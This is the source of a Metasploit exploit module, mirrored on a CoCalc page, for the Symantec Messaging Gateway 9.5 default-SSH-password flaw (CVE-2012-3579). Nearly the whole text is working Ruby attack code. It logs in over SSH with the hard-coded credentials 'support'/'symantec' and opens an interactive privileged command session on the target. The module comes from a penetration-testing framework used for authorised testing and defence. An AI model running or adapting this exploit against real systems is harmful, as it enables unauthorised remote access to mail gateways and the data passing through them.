CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/ssh/symantec_smg_ssh.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'net/ssh'6require 'net/ssh/command_stream'78class MetasploitModule < Msf::Exploit::Remote9Rank = ExcellentRanking1011include Msf::Exploit::Remote::SSH1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability',18'Description' => %q{19This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.20The 'support' user has a known default password, which can be used to login to the21SSH service, and gain privileged access from remote.22},23'License' => MSF_LICENSE,24'Author' => [25'Stefan Viehbock', # Original discovery26'Ben Williams', # Reporting the vuln + coordinated release27'sinn3r' # Metasploit28],29'References' => [30['CVE', '2012-3579'],31['OSVDB', '85028'],32['BID', '55143'],33['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']34],35'DefaultOptions' => {36'EXITFUNC' => 'thread'37},38'Payload' => {39'Compat' => {40'PayloadType' => 'cmd_interact',41'ConnectionType' => 'find'42}43},44'Platform' => 'unix',45'Arch' => ARCH_CMD,46'Targets' => [47['Symantec Messaging Gateway 9.5', {}],48],49'Privileged' => true,50# Timestamp on Symantec advisory51# But was found on Jun 26, 201252'DisclosureDate' => '2012-08-27',53'DefaultTarget' => 0,54'Notes' => {55'Stability' => [CRASH_SAFE],56'Reliability' => [REPEATABLE_SESSION],57'SideEffects' => []58}59)60)6162register_options([63Opt::RPORT(22)64])6566register_advanced_options([67OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),68OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])69])70end7172def do_login(user, pass)73opts = ssh_client_defaults.merge({74auth_methods: ['password', 'keyboard-interactive'],75port: rport,76password: pass77})7879opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']8081begin82ssh = nil83::Timeout.timeout(datastore['SSH_TIMEOUT']) do84ssh = Net::SSH.start(rhost, user, opts)85end86rescue Rex::ConnectionError87return88rescue Net::SSH::Disconnect, ::EOFError89print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"90return91rescue ::Timeout::Error92print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"93return94rescue Net::SSH::AuthenticationFailed95print_error "#{rhost}:#{rport} SSH - Failed authentication"96rescue Net::SSH::Exception => e97print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"98return99end100101if ssh102conn = Net::SSH::CommandStream.new(ssh)103ssh = nil104return conn105end106107return nil108end109110def exploit111user = 'support'112pass = 'symantec'113114print_status("#{rhost}:#{rport} - Attempt to login...")115conn = do_login(user, pass)116if conn117print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")118handler(conn.lsock)119end120end121end122123124